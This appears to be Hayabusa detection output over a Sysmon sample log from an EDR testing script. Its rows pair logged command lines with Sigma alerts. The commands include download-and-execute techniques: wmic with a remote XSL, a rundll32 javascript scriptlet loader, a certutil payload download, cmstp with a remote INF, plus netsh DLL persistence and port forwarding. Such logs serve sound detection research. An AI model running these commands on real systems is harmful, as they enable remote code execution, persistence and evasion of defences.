+2019-07-30 06:33:54.630 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Microsoft\Windows\INetCache\IE\LQ86GWLO\Wmic_calc[1].xsl | Process: C:\Windows\System32\Wbem\WMIC.exe | PID: 4896 | PGUID: 747F3D96-6642-5D3F-0000-0010F69D8A00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:54.630 +09:00,MSEDGEWIN10,11,high,,Windows Shell File Write to Suspicious Folder,,../hayabusa-rules/sigma/file_event/file_event_win_shell_write_susp_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:54.718 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" | LID: 0x413182 | PID: 5728 | PGUID: 747F3D96-6642-5D3F-0000-0010D6C98A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:56.665 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49830 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\wbem\WMIC.exe | PID: 4896 | PGUID: 747F3D96-6642-5D3F-0000-0010F69D8A00,../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:58.256 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5084 | PGUID: 747F3D96-6646-5D3F-0000-0010E32E8B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:58.256 +09:00,MSEDGEWIN10,1,medium,Disc | CredAccess,Capture a Network Trace with netsh.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_netsh_packet_capture.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:58.286 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh trace show status | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4148 | PGUID: 747F3D96-6646-5D3F-0000-0010A7318B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:58.485 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh.exe add helper AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3824 | PGUID: 747F3D96-6646-5D3F-0000-001051388B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:58.543 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6760 | PGUID: 747F3D96-6646-5D3F-0000-001029398B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:58.598 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3868 | PGUID: 747F3D96-6646-5D3F-0000-0010A7398B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:58.683 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh trace stop | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6232 | PGUID: 747F3D96-6646-5D3F-0000-0010913A8B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:00.330 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh trace show status | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh trace show status | LID: 0x413182 | PID: 5760 | PGUID: 747F3D96-6647-5D3F-0000-0010F4648B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:00.420 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl | LID: 0x413182 | PID: 5056 | PGUID: 747F3D96-6647-5D3F-0000-0010AE6E8B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:00.420 +09:00,MSEDGEWIN10,1,medium,Disc | CredAccess,Capture a Network Trace with netsh.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_netsh_packet_capture.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:00.434 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh trace stop | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh trace stop | LID: 0x413182 | PID: 4568 | PGUID: 747F3D96-6647-5D3F-0000-001005738B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:00.442 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 | LID: 0x413182 | PID: 5048 | PGUID: 747F3D96-6647-5D3F-0000-001065758B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:00.442 +09:00,MSEDGEWIN10,1,medium,LatMov | Evas | C2,Netsh Port Forwarding,,../hayabusa-rules/sigma/process_creation/proc_creation_win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:00.460 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 | LID: 0x413182 | PID: 4028 | PGUID: 747F3D96-6647-5D3F-0000-001057768B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:00.460 +09:00,MSEDGEWIN10,1,medium,LatMov | Evas | C2,Netsh Port Forwarding,,../hayabusa-rules/sigma/process_creation/proc_creation_win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:00.466 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh.exe add helper AllTheThings.dll | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh.exe add helper AllTheThings.dll | LID: 0x413182 | PID: 5236 | PGUID: 747F3D96-6647-5D3F-0000-0010927C8B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:00.466 +09:00,MSEDGEWIN10,1,high,PrivEsc,Suspicious Netsh DLL Persistence,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_netsh_dll_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:00.731 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 5376 | PGUID: 747F3D96-6647-5D3F-0000-001052998B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:00.970 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5256 | PGUID: 747F3D96-6648-5D3F-0000-0010B9AB8B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:01.090 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\dispdiag.exe -out dispdiag_start.dat | Process: C:\Windows\System32\dispdiag.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl | LID: 0x413182 | PID: 3704 | PGUID: 747F3D96-6648-5D3F-0000-001092BB8B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:05.237 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c rundll32 AllTheThings.dll,EntryPoint | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6836 | PGUID: 747F3D96-664D-5D3F-0000-0010F1498C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:05.252 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6056 | PGUID: 747F3D96-664D-5D3F-0000-0010114D8C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:05.502 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 AllTheThings.dll,EntryPoint | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c rundll32 AllTheThings.dll,EntryPoint | LID: 0x413182 | PID: 912 | PGUID: 747F3D96-664D-5D3F-0000-00108D5B8C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:05.542 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 AllTheThings.dll,EntryPoint | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32 AllTheThings.dll,EntryPoint | LID: 0x413182 | PID: 5572 | PGUID: 747F3D96-664D-5D3F-0000-0010BB5D8C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5844 | PGUID: 747F3D96-6652-5D3F-0000-0010B9708C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,high,Evas,Rundll32 JS RunHTMLApplication Pattern,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_js_runhtmlapplication.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:10.388 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5268 | PGUID: 747F3D96-6652-5D3F-0000-001059728C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") | LID: 0x413182 | PID: 348 | PGUID: 747F3D96-6652-5D3F-0000-001058828C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,high,Evas,Rundll32 JS RunHTMLApplication Pattern,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_js_runhtmlapplication.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,high,,Application Executed Non-Executable Extension,,../hayabusa-rules/sigma/process_creation/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:11.501 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") | LID: 0x413182 | PID: 4888 | PGUID: 747F3D96-6653-5D3F-0000-001083BC8C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:12.352 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:49831 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\rundll32.exe | PID: 348 | PGUID: 747F3D96-6652-5D3F-0000-001058828C00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:12.352 +09:00,MSEDGEWIN10,3,medium,Evas | Exec,Rundll32 Internet Connection,,../hayabusa-rules/sigma/network_connection/sysmon_rundll32_net_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:15.226 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1808 | PGUID: 747F3D96-6657-5D3F-0000-001029198D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:15.226 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:15.252 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2296 | PGUID: 747F3D96-6657-5D3F-0000-0010D01A8D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} | LID: 0x413182 | PID: 1004 | PGUID: 747F3D96-6657-5D3F-0000-001011298D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,high,,Application Executed Non-Executable Extension,,../hayabusa-rules/sigma/process_creation/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:20.238 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 7088 | PGUID: 747F3D96-665C-5D3F-0000-0010096B8D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:20.238 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:20.262 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3076 | PGUID: 747F3D96-665C-5D3F-0000-0010DC6B8D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:20.459 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 | Process: C:\Windows\System32\certutil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 | LID: 0x413182 | PID: 4520 | PGUID: 747F3D96-665C-5D3F-0000-0010E37B8D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:20.459 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:21.867 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49832 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\certutil.exe | PID: 4520 | PGUID: 747F3D96-665C-5D3F-0000-0010E37B8D00,../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:21.867 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49833 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\certutil.exe | PID: 4520 | PGUID: 747F3D96-665C-5D3F-0000-0010E37B8D00,../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:25.202 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6428 | PGUID: 747F3D96-6661-5D3F-0000-00107AB88D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
